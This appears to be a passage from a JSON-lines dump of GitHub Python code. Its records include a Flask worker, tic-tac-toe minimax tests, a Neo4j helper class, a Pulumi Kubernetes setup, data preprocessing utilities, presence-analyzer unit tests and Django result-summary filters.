bdb.BackendDB()\n self.OUTPUT_FOLDER = app.config['OUTPUT_FOLDER']\n self.UPLOAD_FOLDER = app.config['UPLOAD_FOLDER']\n \n def score(self, token):\n self.db.set_state(token, bdb.States.SCORE_WORK)\n self.db.add_message(token, 'Received file')\n expr_file = self.db.get_files(token)['EXPRESSION']\n outfile = os.path.join(self.OUTPUT_FOLDER, \"%s.KMTEXT.csv\" % (token, ) ) \n status,res = self.do_score(token, expr_file, outfile)\n if (status):\n self.db.add_file(token, outfile, bdb.Filetypes.CLUSTERS)\n self.db.set_state(token, bdb.States.SCORED)\n self.db.add_message(token, 'Work finished')\n else:\n self.db.set_state(token, bdb.States.FILE_FAILED)\n self.db.add_message(token, res)\n \n def score_surv(self, token):\n self.db.set_state(token, bdb.States.SURV_WORK)\n self.db.add_message(token, \"Received survival data\")\n files = self.db.get_files(token)\n survfile = files['SURVIVAL']\n clusterfile = files['CLUSTERS']\n status,res,res2 = self.do_surv(token, survfile,clusterfile)\n if(status):\n self.db.add_file(token, res, bdb.Filetypes.KMPLOT)\n self.db.add_file(token, res2, bdb.Filetypes.KMTEXT)\n self.db.set_state(token, bdb.States.SURVDONE)\n self.db.add_message(token, \"KM plot done\")\n else:\n self.db.set_state(token, bdb.States.SURV_FAILED)\n self.db.add_message(token, res)\n\n def do_score(self, token, datafile, outfile):\n sc = scorer.Scorer()\n ok, error = sc.load_data(datafile, True)\n if ok:\n self.db.add_message(token, error)\n else:\n self.db.add_message(token, res)\n return 
(False,error)\n sc.score()\n outfile = sc.save(outfile)\n return (True, \"\")\n \n def do_surv(self, token, survfile, clusterfile):\n kmplotfile = os.path.join(self.OUTPUT_FOLDER, token+\".KMPLOT.png\")\n kmtextfile = os.path.join(self.OUTPUT_FOLDER, token+\".KMTEXT.csv\")\n sc = scorer.Scorer()\n ok, error = sc.load_surv(survfile, clusterfile)\n if (not ok):\n return (False, error, \"\") \n sc.score_surv(kmplotfile, kmtextfile)\n return(True, kmplotfile, kmtextfile)\n","repo_name":"dnebdal/clusterscore","sub_path":"worker/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"45028139925","text":"from unittest import TestCase\nfrom src.tictactoe.t3_board import T3Board\nfrom src.tictactoe.t3_tree import T3Tree, Node\nfrom .test_constants import (\n VALID_BOARD,\n COMMON_BOARD_OPENING,\n X_ALMOST_WINS,\n O_ALMOST_WINS,\n VALID_O_WINS,\n EMPTY_BOARD,\n)\n\n\nclass TestT3Tree(TestCase):\n def setUp(self):\n self.board = T3Board(VALID_BOARD)\n self.tree = T3Tree(self.board)\n\n def test_init(self):\n self.assertIsInstance(self.tree.root, Node)\n self.assertEqual(self.tree.root.board, self.board)\n\n def test_tree_properties_after_construction(self):\n # Given\n initial_state = T3Board(COMMON_BOARD_OPENING)\n tree = T3Tree(initial_state)\n\n # When\n root_state = tree.root.board.state\n root_child_count = len(tree.root.childs)\n\n # Then\n self.assertEqual(\n root_state,\n initial_state.state,\n \"Root state of the tree should match the initial state\",\n )\n self.assertEqual(\n root_child_count, 8, \"Root should have 8 children (for 8 possible moves)\"\n )\n for child_node in tree.root.childs:\n self.assertEqual(\n len(child_node.board.state),\n 9,\n \"Each child node should have a board state of length 9\",\n )\n if not child_node.board.get_winner():\n self.assertGreater(\n len(child_node.childs),\n 0,\n \"Non-terminal child nodes should have children\",\n )\n else:\n self.assertEqual(\n len(child_node.childs),\n 0,\n \"Terminal child nodes should not have children\",\n )\n\n def test_given_x_almost_win_when_minimax_then_return_1(self):\n initial_state = T3Board(X_ALMOST_WINS)\n tree = T3Tree(initial_state)\n\n score = tree.minimax(tree.root, True, \"X\")\n\n self.assertEqual(score, 1)\n\n def test_given_board_when_minimax_then_return_0(self):\n initial_state = T3Board(VALID_BOARD)\n tree = T3Tree(initial_state)\n\n score = tree.minimax(tree.root, True, \"O\")\n\n self.assertEqual(score, 0)\n\n def test_given_valid_o_win_when_minimax_then_return_minus_1(self):\n initial_state = T3Board(VALID_O_WINS)\n tree = T3Tree(initial_state)\n\n score = tree.minimax(tree.root, True, \"X\")\n\n self.assertEqual(score, -1)\n\n def test_given_empty_board_when_minimax_then_return_valid_score(self):\n initial_state = T3Board(EMPTY_BOARD)\n tree = T3Tree(initial_state)\n\n score = tree.minimax(tree.root, True, \"X\")\n\n self.assertTrue(-1 <= score <= 1)\n\n def test_given_known_board_when_get_scores_then_return_expected_scores(self):\n initial_state = T3Board(O_ALMOST_WINS)\n tree = T3Tree(initial_state)\n\n scores = tree.get_scores()\n\n expected_scores = [1, 0, -1, -1]\n actual_scores = [score for score, _ in scores]\n self.assertEqual(actual_scores, expected_scores)\n\n def test_given_known_scores_when_get_best_moves_then_return_expected_moves(self):\n pass # TODO: implement this test\n\n def test_get_stats_from_childs(self):\n # Here you can test get_stats_from_childs 
method\n pass\n\n def test_count_leafs(self):\n # Here you can test count_leafs method\n pass\n\n\nif __name__ == \"__main__\":\n pass\n","repo_name":"Nootonium/AIPlaymaker","sub_path":"tests/tictactoe/test_t3_tree.py","file_name":"test_t3_tree.py","file_ext":"py","file_size_in_byte":3475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33818371926","text":"import datetime\nimport time\n\nfrom py2neo import Graph, Relationship, Node\nimport os\nimport uuid\nimport networkx as nx\nfrom shutil import move\n\n\nclass Neo4jUtils:\n def __init__(self):\n\n self.host = os.getenv(\"neo4j_host\", \"localhost\")\n # temple edit\n # self.port = int(os.getenv(\"neo4j_port\", \"7688\"))\n self.port = int(os.getenv(\"neo4j_port\", \"7687\"))\n self.user = os.getenv(\"neo4j_user\", \"neo4j\")\n self.password = os.getenv(\"neo4j_password\", \"magi\")\n counter = 0\n while True:\n try:\n if counter % 10000 == 0:\n print(f\"Trying to connect neo4j at host: {self.host}, port: {self.port}\")\n self.graph = Graph(host=self.host, port=self.port, user=self.user, password=self.password)\n print(\"Connected!\")\n self.graph.run(\"CREATE INDEX magi_index IF NOT EXISTS FOR (n:magi) ON (n.magi_display_name)\")\n break\n except:\n if counter % 10000 == 0:\n print(\"Connection failed. Trying again\")\n counter += 1\n time.sleep(5)\n continue\n try:\n self.graph.schema.create_index(\"magi\", \"level\")\n except:\n pass\n\n def __commit_transaction(self, entity):\n transaction = self.graph.begin()\n transaction.create(entity)\n transaction.commit()\n\n def __create_relationship(self, start_node: Node, end_node: Node, relation_name: str, relation_properties: dict):\n relationship = Relationship(start_node, relation_name, end_node)\n relation_properties['magi_insert_date'] = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n for key, value in relation_properties.items():\n relationship[key] = value\n self.__commit_transaction(relationship)\n return relationship\n\n def create_node(self, name: str, level: str, properties: dict):\n if not level:\n raise ValueError(\"Level must be provided.\")\n if level.upper().startswith(\"L2\"):\n existing_node = self.graph.nodes.match(name, level=level).first()\n if existing_node is not None:\n return existing_node\n properties['level'] = level.upper()\n properties['magi_display_name'] = name\n properties['magi_insert_date'] = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n node = Node(\"magi\", name, **properties)\n self.__commit_transaction(node)\n return node\n\n def get_node_by_id(self, node_id: int):\n return self.graph.nodes.get(node_id)\n\n def find_node_id(self, name: str, level: str):\n match = self.graph.nodes.match(name, level=level).first()\n return match.identity if match is not None else None\n\n def add_antisymmetric_relation(self, start_node: Node, end_node: Node, relation_name: str,\n relation_properties: dict):\n start_node_level = start_node[\"level\"]\n end_node_level = end_node[\"level\"]\n if start_node_level != end_node_level:\n raise ValueError(\"Cannot add antisymmetric relation between two nodes with different levels.\")\n relation = self.__create_relationship(start_node, end_node, relation_name, relation_properties)\n return relation\n\n def add_intension(self, start_node: Node, end_node: Node, relation_properties: dict):\n start_node_levels = start_node[\"level\"].split(\".\")\n end_node_levels = end_node[\"level\"].split(\".\")\n\n if int(start_node_levels[0][1:]) > 
int(end_node_levels[0][1:]):\n raise ValueError(\"Level of start node cannot be greater than the level of end node.\")\n\n if len(start_node_levels) == 2 and len(end_node_levels) == 2:\n if int(start_node_levels[1]) >= int(end_node_levels[1]):\n raise ValueError(\"Level of start node cannot be greater than or equal to the level of end node.\")\n\n intension = self.__create_relationship(start_node, end_node, \"intension\", relation_properties)\n return intension\n\n def add_extension(self, start_node: Node, end_node: Node, relation_properties: dict):\n start_node_levels = start_node[\"level\"].split(\".\")\n end_node_levels = end_node[\"level\"].split(\".\")\n\n if int(start_node_levels[0][1:]) < int(end_node_levels[0][1:]):\n raise ValueError(\"Level of start node cannot be less than the level of end node.\")\n\n if len(start_node_levels) == 2 and len(end_node_levels) == 2:\n if int(start_node_levels[1]) <= int(end_node_levels[1]):\n raise ValueError(\"Level of start node cannot be less than or equal to the level of end node.\")\n\n extension = self.__create_relationship(start_node, end_node, \"extension\", relation_properties)\n return extension\n\n def add_symmetric_relation(self, start_node: Node, end_node: Node, relation_name: str, relation_properties: dict):\n if start_node[\"level\"] != end_node[\"level\"]:\n raise ValueError(\"Cannot add symmetric relation between two nodes with different levels.\")\n relation1 = self.__create_relationship(start_node, end_node, relation_name, relation_properties)\n relation2 = self.__create_relationship(end_node, start_node, relation_name, relation_properties)\n return relation1, relation2\n\n def follows_temporally(self, start_node: Node, end_node: Node, how_many: int, how_long: str,\n contribution_amount: float):\n if start_node[\"level\"] != end_node[\"level\"]:\n raise ValueError(\"Cannot add symmetric relation between two nodes with different levels.\")\n # create the relation bw start_node and end_node if it does not exist\n # if exists, concat how_many and how_long to the attributes as a string\n relations = self.graph.match([start_node, end_node], r_type='followsTemporally').all()\n if len(relations) == 0:\n new_relation = self.__create_relationship(start_node, end_node, \"followsTemporally\",\n relation_properties={\"how_many\": how_many,\n \"how_long\": how_long,\n \"contribution_amount\": contribution_amount})\n return new_relation\n else:\n relations[0][\"how_many\"] += how_many\n if how_long and len(how_long) > 0:\n relations[0][\"how_long\"] = relations[0][\"how_long\"] + \",\" + how_long\n self.graph.push(relations[0])\n return relations[0]\n\n def export_db_to_graphml(self):\n file_name = str(uuid.uuid4())\n self.graph.run(\n f\"CALL apoc.export.graphml.all('/data/{file_name}.graphml', {{useTypes:true, storeNodeIds:false}})\").data()\n file_path = f\"/data/{file_name}.graphml\"\n self.clean_db()\n return file_path\n\n def clean_db(self):\n result = self.graph.run(\"match (n) detach delete n\").data()\n return result\n\n def create_graph_nx(self, graph_dict: dict, merge_nodes_level: str):\n creation_date = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n graph = nx.MultiDiGraph()\n for node in graph_dict[\"nodes\"]:\n graph.add_node(node[\"name\"] + \"_\" + node[\"level\"],\n labels=f\":magi\",\n magi_display_name=node[\"name\"],\n insert_date=creation_date,\n level=str(node[\"level\"]).strip().upper(),\n **node[\"properties\"])\n\n for relation_triplets in graph_dict[\"relation_triplets\"]:\n graph.add_edge(\n 
graph_dict[\"nodes\"][relation_triplets[0]][\"name\"] + \"_\" + graph_dict[\"nodes\"][relation_triplets[0]][\n \"level\"],\n graph_dict[\"nodes\"][relation_triplets[2]][\"name\"] + \"_\" + graph_dict[\"nodes\"][relation_triplets[2]][\n \"level\"],\n labels=relation_triplets[1],\n magi_display_name=relation_triplets[1],\n insert_date=creation_date,\n **relation_triplets[3])\n\n local_graphml_name = f\"{str(uuid.uuid4())}.graphml\"\n nx.write_graphml_lxml(graph, local_graphml_name, named_key_ids=True)\n move(local_graphml_name, f\"/data/{local_graphml_name}\")\n self.graph.run(\n f'CALL apoc.import.graphml(\"/data/{local_graphml_name}\", {{readLabels: true, storeNodeIds:true}})').data()\n self.merge_nodes(merge_nodes_level)\n os.remove(f\"/data/{local_graphml_name}\")\n return True\n\n def merge_nodes(self, level: str):\n self.graph.run(\n f'MATCH (n1),(n2) WHERE n1.magi_display_name = n2.magi_display_name and n1.level = n2.level and n1.level starts with \"{str(level).strip().upper()}\" and id(n1) < id(n2) WITH [n1,n2] as ns CALL apoc.refactor.mergeNodes(ns,{{properties:\"overwrite\", mergeRels: \"true\"}}) yield node RETURN true')\n\n def search_graph_for_nlp(self, text: str):\n result = []\n nodes = self.graph.nodes.match().where(f\"_.magi_display_name =~ '(?i){text.strip()}'\").all()\n for node in nodes:\n relationships = self.graph.match(r_type=None, nodes=(node, None)).all()\n for rel in relationships:\n result.append({\n \"relation\": type(rel).__name__,\n \"end_node\": rel.end_node[\"magi_display_name\"]\n })\n return result\n","repo_name":"sametdumankaya/MicroserviceStack","sub_path":"Neo4jAPI/neo4j_utils.py","file_name":"neo4j_utils.py","file_ext":"py","file_size_in_byte":9576,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41843083091","text":"import pulumi\nfrom pulumi_kubernetes.apps.v1 import Deployment\nfrom pulumi_kubernetes.core.v1 import Service\nfrom pulumi_kubernetes.helm.v3 import Chart, ChartOpts\n\napi_deployment = Deployment(\n \"api-deployment\",\n spec={\n \"selector\": {\"matchLabels\": {\"app\": \"api\"}},\n \"template\": {\n \"metadata\": {\"labels\": {\"app\": \"api\"}},\n \"spec\": {\n \"containers\": [\n {\n \"name\": \"api\",\n \"image\": \"martins87/my-api\",\n \"env\": [{\"name\": \"JOBS_SERVICE\", \"value\": \"os.environ['JOBS_SERVICE']\"}],\n \"ports\": [{\"name\": \"http\", \"containerPort\": 5000}],\n }\n ]\n },\n },\n },\n)\n\napi_service = Service(\n \"api-service\",\n metadata={\"name\": \"api-service\"},\n spec={\n \"selector\": {\"app\": \"api\"},\n \"ports\": [{\"name\": \"http\", \"port\": 80, \"targetPort\": 5000}],\n \"type\": \"ClusterIP\",\n },\n)\n\njobs_deployment = Deployment(\n \"jobs-deployment\",\n spec={\n \"selector\": {\"matchLabels\": {\"app\": \"jobs\"}},\n \"template\": {\n \"metadata\": {\"labels\": {\"app\": \"jobs\"}},\n \"spec\": {\n \"containers\": [\n {\n \"name\": \"jobs\",\n \"image\": \"martins87/myapp\",\n \"ports\": [{\"name\": \"http\", \"containerPort\": 5001}],\n }\n ]\n },\n },\n },\n)\n\njobs_service = Service(\n \"jobs-service\",\n metadata={\"name\": \"jobs-service\"},\n spec={\n \"selector\": {\"app\": \"jobs\"},\n \"ports\": [{\"name\": \"http\", \"port\": 80, \"targetPort\": 5001}],\n \"type\": \"ClusterIP\",\n 
},\n)\n","repo_name":"folefac87/DevOps-Challenge","sub_path":"pulumi/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39412616977","text":"# 242. Valid Anagram\n# Given two strings s and t, return true if t is an anagram of s, and false otherwise.\n# An Anagram is a word or phrase formed by rearranging the letters of a different word or phrase, typically using all the original letters exactly once.\n\nclass Solution(object):\n def isAnagram(self, s, t):\n \"\"\"\n :type s: str\n :type t: str\n :rtype: bool\n \"\"\"\n if len(s) != len(t):\n return False\n \n if \"\".join(sorted(s)) == \"\".join(sorted(t)):\n return True\n else:\n return False\n\n## main\nif __name__ ==\"__main__\":\n s = \"anagram\"\n t = \"aaangrm\"\n\n Sol = Solution()\n print(Sol.isAnagram(s,t))\n","repo_name":"frozen211/MyCode","sub_path":"Python/isAnagram.py","file_name":"isAnagram.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42084419232","text":"import numpy as np\nimport pandas as pd\nfrom imblearn.over_sampling import BorderlineSMOTE\nfrom sklearn.model_selection import KFold, train_test_split\n\n\ndef one_column_factorize(column):\n return column.factorize()[0]\n\n\ndef columns_factorize(df):\n for (columnName, columnData) in df.items():\n if columnData.dtype == object:\n df[columnName] = df[columnName].factorize()[0]\n return df\n\n\ndef semi_auto_factorize(data):\n factorize_list = []\n for (columnName, columnData) in data.items():\n if columnData.dtype == object:\n factorized_data, indexes = pd.factorize(data[columnName])\n data[columnName] = factorized_data\n factorize_list.append((columnName, {i: indexes[i] for i in range(len(indexes))}))\n return data, factorize_list\n\n\ndef manual_factorize(data, factorize_list, clip=True, input_fact=False):\n \"\"\"\n Func for factorize dataset\n :param clip: default True, apply np.clip on data, set False for iterate over string values\n :param data: dataset\n :param factorize_list: list of tuples containing column name and mapping dict, [('Sex', {0: 'M', 1: 'F'}),\n ('BodyType', {0: 'Slim', 1: 'Fat'})]\n :param input_fact: default False, set True for factorize input data\n :return data: factorized dataset\n \"\"\"\n for column in factorize_list:\n if clip:\n length = len(column[1])\n # data[column[0]] = data[column[0]].apply(\n # lambda x: 0 if x < 0 else (length - 1 if x >= length else x))\n data[column[0]] = np.clip(data[column[0]], 0, length - 1)\n if input_fact:\n data[column[0]] = data[column[0]].map(column[1])\n # else:\n # data[column[0]] = data[column[0]].map(column[1])\n return data\n\n\ndef cross_validation(data, file_name, n_splits=5):\n kfold = KFold(n_splits=n_splits, shuffle=True)\n\n for i, split_index in enumerate(kfold.split(data)):\n data.iloc[split_index[0]].to_csv(f'train_{i + 1}_{file_name}.csv', index=False)\n data.iloc[split_index[1]].to_csv(f'test_{i + 1}_{file_name}.csv', index=False)\n return True\n\n\ndef simple_split(data, test_size, shuffle=True, random_state=42):\n \"\"\"\n Func for splitting dataset into train and test datasets\n :param data:\n :param test_size:\n :param shuffle: set False to prevent dataset from shuffled\n :param random_state: set None to generate split datasets randomly\n :return: split into train and test datasets\n \"\"\"\n x, y = train_test_split(data, test_size=test_size, 
shuffle=shuffle, random_state=random_state)\n x = x.reset_index(drop=True)\n y = y.reset_index(drop=True)\n return x, y\n\n\ndef borderline_smote(data, target):\n border_smote = BorderlineSMOTE()\n x = data.drop(target, axis=1)\n y = data[target]\n\n x, y = border_smote.fit_resample(x, y)\n\n x[target] = y\n\n return x\n","repo_name":"EnZaNin/SyntheticDataGenerator","sub_path":"utils/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":2875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36943995949","text":"# -*- coding: utf-8 -*-\n\"\"\"\nPresence analyzer unit tests.\n\"\"\"\nimport os.path\nimport json\nimport datetime\nimport unittest\n\nfrom presence_analyzer import main, utils\n\n\nTEST_DATA_CSV = os.path.join(\n os.path.dirname(__file__), '..', '..', 'runtime', 'data', 'test_data.csv'\n)\nTEST_DATA_CSV_2 = os.path.join(\n os.path.dirname(__file__), '..', '..', 'runtime', 'data', 'test_data_2.csv'\n)\nTEST_USERS_DATA = os.path.join(\n os.path.dirname(__file__), '..', '..', 'runtime', 'data', 'test_users.xml'\n)\n\n\n# pylint: disable=E1103\nclass PresenceAnalyzerViewsTestCase(unittest.TestCase):\n \"\"\"\n Views tests.\n \"\"\"\n\n def setUp(self):\n \"\"\"\n Before each test, set up a environment.\n \"\"\"\n main.app.config.update({\n 'DATA_CSV': TEST_DATA_CSV,\n 'USER_DATA_XML': TEST_USERS_DATA,\n })\n self.client = main.app.test_client()\n\n def tearDown(self):\n \"\"\"\n Get rid of unused objects after each test.\n \"\"\"\n pass\n\n def test_mainpage(self):\n \"\"\"\n Test main page redirect.\n \"\"\"\n resp = self.client.get('/')\n self.assertEqual(resp.status_code, 200)\n self.assertIn(\"Welcome in presence analyzer\", resp.data)\n\n def test_templateview_rendering(self):\n \"\"\"\n Test page rendering with url given template name.\n \"\"\"\n resp = self.client.get('/presence_start_end')\n self.assertEqual(resp.status_code, 200)\n self.assertIn(\"Presence start-end weekday\", resp.data)\n resp = self.client.post('/presence_start_end')\n self.assertEqual(resp.status_code, 405)\n\n resp = self.client.get('/mean_time_weekday')\n self.assertEqual(resp.status_code, 200)\n self.assertIn(\"Presence mean time by weekday\", resp.data)\n resp = self.client.post('/mean_time_weekday')\n self.assertEqual(resp.status_code, 405)\n\n resp = self.client.get('/presence_weekday')\n self.assertEqual(resp.status_code, 200)\n self.assertIn(\"Presence by weekday\", resp.data)\n resp = self.client.post('/presence_weekday')\n self.assertEqual(resp.status_code, 405)\n\n resp = self.client.get('/not_existing_page')\n self.assertEqual(resp.status_code, 404)\n\n def test_api_users(self):\n \"\"\"\n Test users listing.\n \"\"\"\n resp = self.client.get('/api/v1/users')\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(resp.content_type, 'application/json')\n data = json.loads(resp.data)\n self.assertEqual(len(data), 2)\n self.assertDictEqual(data[0], {u'user_id': 10, u'name': u'User 10'})\n\n def test_new_api_users(self):\n \"\"\"\n Test users xml api listing.\n \"\"\"\n resp = self.client.get('/api/v2/users')\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(resp.content_type, 'application/json')\n data = json.loads(resp.data)['users']\n self.assertEqual(len(data), 3)\n self.assertDictEqual(data[0], {\n u'id': 141,\n u'name': u'Adam P.',\n u'avatar': u'/api/images/users/141'\n })\n \n def test_api_presence_start_end(self):\n \"\"\"\n Test user weekday presence start end\n \"\"\"\n resp = 
self.client.get('/api/v1/presence_start_end/11')\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(resp.content_type, 'application/json')\n data = json.loads(resp.data)\n self.assertEqual(len(data), 7)\n self.assertItemsEqual(data, [\n [u'Mon', 33134, 57257],\n [u'Tue', 33590, 50154],\n [u'Wed', 33206, 58527],\n [u'Thu', 35602, 58586],\n [u'Fri', 47816, 54242],\n [u'Sat', 0, 0],\n [u'Sun', 0, 0],\n ])\n\n def test_api_presence_weekday(self):\n \"\"\"\n Test user presence grouped by weekday api\n \"\"\"\n resp = self.client.get('/api/v1/presence_weekday/10')\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(resp.content_type, 'application/json')\n data = json.loads(resp.data)\n self.assertEqual(len(data), 8)\n self.assertItemsEqual(data, [\n [u'Weekday', u'Presence (s)'],\n [u'Mon', 0],\n [u'Tue', 30047],\n [u'Wed', 24465],\n [u'Thu', 23705],\n [u'Fri', 0],\n [u'Sat', 0],\n [u'Sun', 0],\n ])\n\n def test_api_presence_meantime(self):\n \"\"\"\n Test user meantime presence grouped by weekday api\n \"\"\"\n resp = self.client.get('/api/v1/mean_time_weekday/11')\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(resp.content_type, 'application/json')\n data = json.loads(resp.data)\n self.assertEqual(len(data), 7)\n self.assertItemsEqual(data, [\n [u'Mon', 24123.0],\n [u'Tue', 16564.0],\n [u'Wed', 25321.0],\n [u'Thu', 22984.0],\n [u'Fri', 6426.0],\n [u'Sat', 0],\n [u'Sun', 0],\n ])\n\n\nclass PresenceAnalyzerUtilsTestCase(unittest.TestCase):\n \"\"\"\n Utility functions tests.\n \"\"\"\n\n def setUp(self):\n \"\"\"\n Before each test, set up a environment.\n \"\"\"\n main.app.config.update({\n 'DATA_CSV': TEST_DATA_CSV,\n 'USER_DATA_XML': TEST_USERS_DATA,\n })\n\n def tearDown(self):\n \"\"\"\n Get rid of unused objects after each test.\n \"\"\"\n pass\n\n def test_get_user_data(self):\n \"\"\"\n Test parsing of user XML file.\n \"\"\"\n data = utils.get_user_data()\n self.assertIsInstance(data, dict)\n self.assertItemsEqual(data.keys(), ['users', 'server'])\n self.assertDictEqual(data['users'][1], {\n u'id': 176,\n u'name': u'Adrian K.',\n u'avatar': u'/api/images/users/176'\n })\n self.assertEqual(data['server'], u'https://intranet.stxnext.pl:443')\n\n def test_get_data_caching(self):\n \"\"\"\n Test caching of get_data method.\n \"\"\"\n data = utils.get_data()\n main.app.config.update({\n 'DATA_CSV': TEST_DATA_CSV_2,\n })\n data_cached = utils.get_data()\n self.assertDictEqual(data, data_cached)\n\n def test_get_data(self):\n \"\"\"\n Test parsing of CSV file.\n \"\"\"\n data = utils.get_data()\n self.assertIsInstance(data, dict)\n self.assertItemsEqual(data.keys(), [10, 11])\n sample_date = datetime.date(2013, 9, 10)\n self.assertIn(sample_date, data[10])\n self.assertItemsEqual(data[10][sample_date].keys(), ['start', 'end'])\n self.assertEqual(data[10][sample_date]['start'],\n datetime.time(9, 39, 5))\n\n def test_group_by_weekday(self):\n \"\"\"\n Test weekday grouping\n \"\"\"\n data = utils.get_data()\n weekdays = utils.group_by_weekday(data[10])\n self.assertItemsEqual(weekdays.keys(), range(7))\n self.assertDictEqual(weekdays, {\n 0: [],\n 1: [30047],\n 2: [24465],\n 3: [23705],\n 4: [],\n 5: [],\n 6: [],\n })\n weekdays = utils.group_by_weekday(data[11])\n self.assertDictEqual(weekdays, {\n 0: [24123],\n 1: [16564],\n 2: [25321],\n 3: [22969, 22999],\n 4: [6426],\n 5: [],\n 6: [],\n })\n\n def test_group_start_end_weekday(self):\n \"\"\"\n Test weekday grouping start end\n \"\"\"\n data = utils.get_data()\n weekdays = 
utils.group_by_weekday_start_end(data[11])\n self.assertItemsEqual(weekdays.keys(), range(7))\n self.assertSequenceEqual(weekdays, {\n 0: {'starts': [33134], 'ends': [57257]},\n 1: {'starts': [33590], 'ends': [50154]},\n 2: {'starts': [33206], 'ends': [58527]},\n 3: {'starts': [37116, 34088], 'ends': [60085, 57087]},\n 4: {'starts': [47816], 'ends': [54242]},\n 5: {'starts': [], 'ends': []},\n 6: {'starts': [], 'ends': []},\n })\n\n def test_seconds_since_midnight(self):\n \"\"\"\n Test seconds since midnight\n \"\"\"\n self.assertEqual(utils.seconds_since_midnight(\n datetime.time(12, 45, 11)), 45911)\n self.assertEqual(utils.seconds_since_midnight(\n datetime.time(0, 0, 1)), 1)\n self.assertEqual(utils.seconds_since_midnight(\n datetime.time(15, 5, 19)), 54319)\n\n def test_interval(self):\n \"\"\"\n Test interval calculation\n \"\"\"\n self.assertEqual(utils.interval(\n datetime.time(12, 0, 0), datetime.time(13, 0, 0)), 3600)\n self.assertEqual(utils.interval(\n datetime.time(13, 0, 0), datetime.time(12, 30, 0)), -1800)\n self.assertEqual(utils.interval(\n datetime.time(4, 4, 4), datetime.time(1, 30, 0)), -9244)\n self.assertEqual(utils.interval(\n datetime.time(0, 0, 0), datetime.time(0, 0, 0)), 0)\n\n def test_mean(self):\n \"\"\"\n Test mean calculation\n \"\"\"\n self.assertEqual(utils.mean(range(1, 8)), 4)\n self.assertAlmostEqual(utils.mean([30.3, 70.2, 1]), 33.8333333)\n self.assertAlmostEqual(utils.mean([0.1, 0.2, 0.3]), 0.2)\n\n\ndef suite():\n \"\"\"\n Default test suite.\n \"\"\"\n suite = unittest.TestSuite()\n suite.addTest(unittest.makeSuite(PresenceAnalyzerViewsTestCase))\n suite.addTest(unittest.makeSuite(PresenceAnalyzerUtilsTestCase))\n return suite\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"pkucmus/presence-analyzer-pkucmus","sub_path":"src/presence_analyzer/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":9680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20752939819","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\nfrom django import template\nfrom django.db.models.aggregates import Sum\nfrom ..models import ResultFranke\n\n__author__ = \"pmeier82\"\n\nregister = template.Library()\nres_tbl_nam = ResultFranke.__name__.lower()\n\n\n# FILTERS\n@register.filter\ndef sort(query_set):\n \"\"\"return the sorted queryset\"\"\"\n\n return query_set.order_by(\"{}__unit_gt\".format(res_tbl_nam))\n\n\n@register.filter\ndef summary(query_set):\n \"\"\"summary from result queryset\"\"\"\n\n # early exit\n if not query_set:\n return None\n\n # aggregate\n return query_set.aggregate(\n KS=Sum(\"{}__KS\".format(res_tbl_nam)),\n KSO=Sum(\"{}__KSO\".format(res_tbl_nam)),\n\n FS=Sum(\"{}__FS\".format(res_tbl_nam)),\n\n TP=Sum(\"{}__TP\".format(res_tbl_nam)),\n TPO=Sum(\"{}__TPO\".format(res_tbl_nam)),\n\n FPAE=Sum(\"{}__FPAE\".format(res_tbl_nam)),\n FPAOE=Sum(\"{}__FPAOE\".format(res_tbl_nam)),\n FP=Sum(\"{}__FP\".format(res_tbl_nam)),\n\n FPA=Sum(\"{}__FPA\".format(res_tbl_nam)),\n FPAO=Sum(\"{}__FPAO\".format(res_tbl_nam)),\n\n FN=Sum(\"{}__FN\".format(res_tbl_nam)),\n FNO=Sum(\"{}__FNO\".format(res_tbl_nam)))\n\n\n@register.filter\ndef summary_table(query_set):\n \"\"\"summary table from result queryset\"\"\"\n\n # early exit\n if not query_set:\n return None\n qs_sum = summary(query_set)\n if not qs_sum:\n return None\n\n # return dict\n return {\"FP\": qs_sum[\"FP\"],\n\n \"FN\": qs_sum[\"FN\"] + qs_sum[\"FNO\"],\n 'FNno': qs_sum[\"FN\"],\n 
